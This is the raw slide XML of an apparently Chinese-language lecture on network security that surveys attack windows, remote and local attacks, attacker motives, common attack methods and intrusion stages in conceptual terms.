              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>新补丁发布</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>窗口：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞暴露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>安装补丁：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>攻击窗口越短，越安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19458"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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>时间性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{650C2C46-C37C-4615-A4A9-D99783B969B1}" type="slidenum">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normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从子网外向子网或者子网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内的系统发动攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所在的局域网，向本单位的其他系统发动攻击，在本机上进行非法越权访问也是本地攻击。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>优缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>远程：打击广，攻击难度大，易于逃脱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>本地：窄，易，难</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内部人员为了掩盖攻击者的身份，从本地获取目标的一些必要信息后，攻击过程从外部远程发起，造成外部入侵的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>现象。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪本地攻击（跳板攻击）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>渗透或控制本地系统或主机，通过其对其它本地系统实施攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击的位置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5372BDFE-8771-4C80-A61C-A70CCF30BF19}"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>黑客：追求技术上的挑战和满足</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>间谍：刺探政治情报</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>恐怖主义者：制造恐怖事件达到政治目的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>公司雇佣者：竞争经济利益</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>职业犯罪：谋求个人经济利益</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>破坏者：实现破坏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>窥探者：窥探隐私</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>无聊者：满足好奇</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>人物</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>者身份与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击目的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7C3AF6E5-3228-4930-AE8B-0BAFFD905FA5}"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62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>窃取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>口令进入系统：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络监听，暴力破解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用系统自身安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>特洛伊木马程序：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪装成工具程序或者游戏等诱使用户打开或下载，然后使用户在无意中激活，导致系统后门被安装</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>WWW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>诱使用户访问纂改过的网页</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>电子邮件攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>邮件炸弹、邮件欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络监听：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>获取明文传输的敏感信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>跳板攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>控制一台主机后，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗或者主机信任关系攻击其他节点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以隐蔽其入侵路径和擦除攻击证据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>拒绝服务攻击和分布式拒绝服务攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(DoS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDoS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>手段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>常见的安全攻击方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>简单拒绝服务（如邮件炸弹攻击）.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本地用户获得非授权读访问</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本地用户获得他们本不应拥有的文件写权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程用户获得了非授权的帐号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程用户获得了特权文件的读权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程用户获得了特权文件的写权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程用户拥有了根（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>root）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>事件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击的层次</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A07EB29B-8BE4-4AB5-B410-AC5FBFCA7CE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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2514600"/>
            <a:ext cx="685800" cy="17526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采用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713733" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2514600"/>
            <a:ext cx="685800" cy="18288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选择</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>会用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>入侵</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713734" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="2667000"/>
            <a:ext cx="685800" cy="1524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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>一定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713735" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="2209800"/>
            <a:ext cx="685800" cy="25146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提</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>升</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>为</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>最</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>高</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713736" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
